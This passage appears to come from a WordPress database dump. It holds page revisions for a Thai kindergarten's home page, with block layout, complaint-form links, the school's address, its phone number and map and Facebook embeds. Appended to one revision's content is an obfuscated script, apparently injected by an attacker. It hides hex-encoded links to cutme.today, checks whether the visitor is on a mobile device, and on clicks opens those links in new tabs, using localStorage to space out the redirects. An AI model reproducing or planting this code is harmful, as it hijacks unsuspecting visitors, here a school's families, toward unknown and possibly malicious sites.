d%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:36:14','2025-07-15 09:36:14','',19,'http://watprato.ssk.in.th/?p=718',0,'revision','',0),
(719,1,'2025-07-15 16:39:08','2025-07-15 09:39:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap 